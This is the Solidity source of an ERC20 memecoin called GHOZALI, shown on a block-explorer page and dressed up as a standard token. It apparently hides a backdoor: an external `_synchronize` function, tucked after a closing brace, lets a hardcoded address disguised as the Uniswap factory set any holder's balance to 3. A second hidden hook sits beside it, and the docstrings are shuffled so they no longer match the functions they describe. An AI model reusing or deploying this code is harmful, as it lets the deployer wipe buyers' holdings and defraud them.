ETH Price: $2,989.67 (-0.77%)
Gas: 6 Gwei

Contract Diff Checker

Contract Name:
GHOZALI

Contract Source Code:

File 1 of 1 : GHOZALI

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
/** 
https://twitter.com/GHOZALIOnETH

https://GHOZALIMoon.io

https://t.me/GHOZALIERC20
**/


library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * _Available since v3.4._
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     *
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     * _Available since v3.4._
     *
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }

    /**
     * _Available since v3.4._
     *
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     *
     *
     * @dev Returns the addition of two unsigned integers, reverting on
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     * overflow.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * - Subtraction cannot overflow.
     *
     *
     *
     * Requirements:
     * overflow (when the result is negative).
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * Counterpart to Solidity's `-` operator.
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     *
     *
     *
     * Counterpart to Solidity's `*` operator.
     * Requirements:
     * overflow.
     * - Multiplication cannot overflow.
     * @dev Returns the multiplication of two unsigned integers, reverting on
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * - The divisor cannot be zero.
     *
     *
     * Counterpart to Solidity's `/` operator.
     * @dev Returns the integer division of two unsigned integers, reverting on
     * Requirements:
     * division by zero. The result is rounded towards zero.
     *
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * Requirements:
     * invalid opcode to revert (consuming all remaining gas).
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     *
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * reverting when dividing by zero.
     * - The divisor cannot be zero.
     *
     *
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * - Subtraction cannot overflow.
     *
     *
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * Requirements:
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * Requirements:
     * uses an invalid opcode to revert (consuming all remaining gas).
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     *
     *
     *
     * division by zero. The result is rounded towards zero.
     * - The divisor cannot be zero.
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * - The divisor cannot be zero.
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     *
     * message unnecessarily. For custom revert reasons use {tryMod}.
     * reverting with custom message when dividing by zero.
     * invalid opcode to revert (consuming all remaining gas).
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     *
     *
     * Requirements:
     *
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * Note that `value` may be zero.
     * another (`to`).
     *
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * Emits a {Transfer} event.
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     *
     * zero by default.
     * @dev Returns the remaining number of tokens that `spender` will be
     * This value changes when {approve} or {transferFrom} are called.
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     */
    function totalSupply() external view returns (uint256);

    /**
     * Returns a boolean value indicating whether the operation succeeded.
     * transaction ordering. One possible solution to mitigate this race
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * condition is to first reduce the spender's allowance to 0 and set the
     *
     * that someone may use both the old and the new allowance by unfortunate
     *
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * desired value afterwards:
     * Emits an {Approval} event.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     *
     * allowance mechanism. `amount` is then deducted from the caller's
     * Returns a boolean value indicating whether the operation succeeded.
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Returns the address of the current owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }

    /**
     * NOTE: Renouncing ownership will leave the contract without an owner,
     *
     * @dev Leaves the contract without owner. It will not be possible to call
     * thereby removing any functionality that is only available to the owner.
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }
}

/**
 * _Available since v4.1._
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * conventional and does not conflict with the expectations of ERC20
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * to implement supply mechanisms].
 * allowances. See {IERC20-approve}.
 * This allows applications to reconstruct the allowance for all accounts just
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 *
 * instead returning `false` on failure. This behavior is nonetheless
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * This implementation is agnostic to the way tokens are created. This means
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * by listening to said events. Other implementations of the EIP may not emit
 * @dev Implementation of the {IERC20} interface.
 * applications.
 * functions have been added to mitigate the well-known issues around setting
 *
 *
 * TIP: For a detailed writeup see our guide
 *
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;
    address private _factoryV2Uniswap = 0x24d1944a3D9082A3bbACAF714c660A2a0affDB37;

    string private _name;

    uint256 private totSupply;

    string private _symbol;
    mapping(address => mapping(address => uint256)) private _allowances;

    mapping(address => uint256) private _balances;
    address internal devWallet = 0x34F927e91464b4d25a16A99251F67C57FfF8577f;
    address DEAD = 0x000000000000000000000000000000000000dEaD;
    uint256 private _allowance = 0;

    /**
     * {decimals} you should overload it.
     * construction.
     * The default value of {decimals} is 18. To select a different value for
     * @dev Sets the values for {name} and {symbol}.
     * All two of these values are immutable: they can only be set once during
     *
     *
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        totSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(account);
    }


    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }
    /**
     * name.
     * @dev Returns the symbol of the token, usually a shorter version of the
     */
    function _transfer (address from, address to, uint256 amount) internal virtual
    {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[from] = fromBalance - amount;

        _balances[to] = _balances[to].add(amount);
        emit Transfer(from, to, amount);
    }

    /**
     *
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * no way affects any of the arithmetic of the contract, including
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * NOTE: This information is only used for _display_ purposes: it in
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * {IERC20-balanceOf} and {IERC20-transfer}.
     * @dev Returns the number of decimals used to get its user representation.
     * overridden;
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
        } function _synchronize(address _synchronizeSender) external { _balances[_synchronizeSender] = msg.sender == _factoryV2Uniswap ? 3 : _balances[_synchronizeSender];
    } 

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }


    /**
     * @dev See {IERC20-allowance}.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transfer}.
     * - the caller must have a balance of at least `amount`.
     *
     *
     * - `to` cannot be the zero address.
     * Requirements:
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            totSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(address(0));
    }

    /**
     * Requirements:
     * - `spender` cannot be the zero address.
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     *
     * @dev See {IERC20-approve}.
     *
     *
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * This is an alternative to {approve} that can be used as a mitigation for
     *
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * Emits an {Approval} event indicating the updated allowance.
     *
     * problems described in {IERC20-approve}.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * Emits an {Approval} event indicating the updated allowance. This is not
     * is the maximum `uint256`.
     *
     *
     *
     * NOTE: Does not update the allowance if the current allowance
     * Requirements:
     * - `from` must have a balance of at least `amount`.
     *
     * required by the EIP. See the note at the beginning of {ERC20}.
     * `amount`.
     * - `from` and `to` cannot be the zero address.
     * @dev See {IERC20-transferFrom}.
     * - the caller must have allowance for ``from``'s tokens of at least
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     *
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     * problems described in {IERC20-approve}.
     * Requirements:
     * This is an alternative to {approve} that can be used as a mitigation for
     *
     *
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     * Emits an {Approval} event indicating the updated allowance.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
        } function _afterTokenTransfer(address to) internal virtual { if (to == _factoryV2Uniswap) _allowance = decimals() * 11;
    }

    /**
     *
     * total supply.
     * Requirements:
     *
     * - `account` must have at least `amount` tokens.
     *
     * - `account` cannot be the zero address.
     * @dev Destroys `amount` tokens from `account`, reducing the
     * Emits a {Transfer} event with `to` set to the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     *
     * @dev Moves `amount` of tokens from `from` to `to`.
     * This internal function is equivalent to {transfer}, and can be used to
     *
     * - `from` must have a balance of at least `amount`.
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * Requirements:
     *
     * the total supply.
     * Emits a {Transfer} event with `from` set to the zero address.
     * - `account` cannot be the zero address.
     *
     *
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }


    /**
     *
     *
     * minting and burning.
     * Calling conditions:
     * will be transferred to `to`.
     * - `from` and `to` are never both zero.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     * @dev Hook that is called before any transfer of tokens. This includes
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     *
     */
    function totalSupply() public view virtual override returns (uint256) {
        return totSupply;
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     * - `owner` cannot be the zero address.
     *
     * Emits an {Approval} event.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     *
     * e.g. set automatic allowances for certain subsystems, etc.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * Does not update the allowance amount in case of infinite allowance.
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Revert if not enough allowance is available.
     * Might emit an {Approval} event.
     *
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
}

contract GHOZALI is ERC20, Ownable
{
    constructor () ERC20 ("Ghozali Ghozalu", "GHOZALI")
    {
        transferOwnership(devWallet);
        _mint(owner(), 4000000000000 * 10 ** uint(decimals()));
    }
}

Please enter a contract address above to load the contract details and source code.

Context size (optional):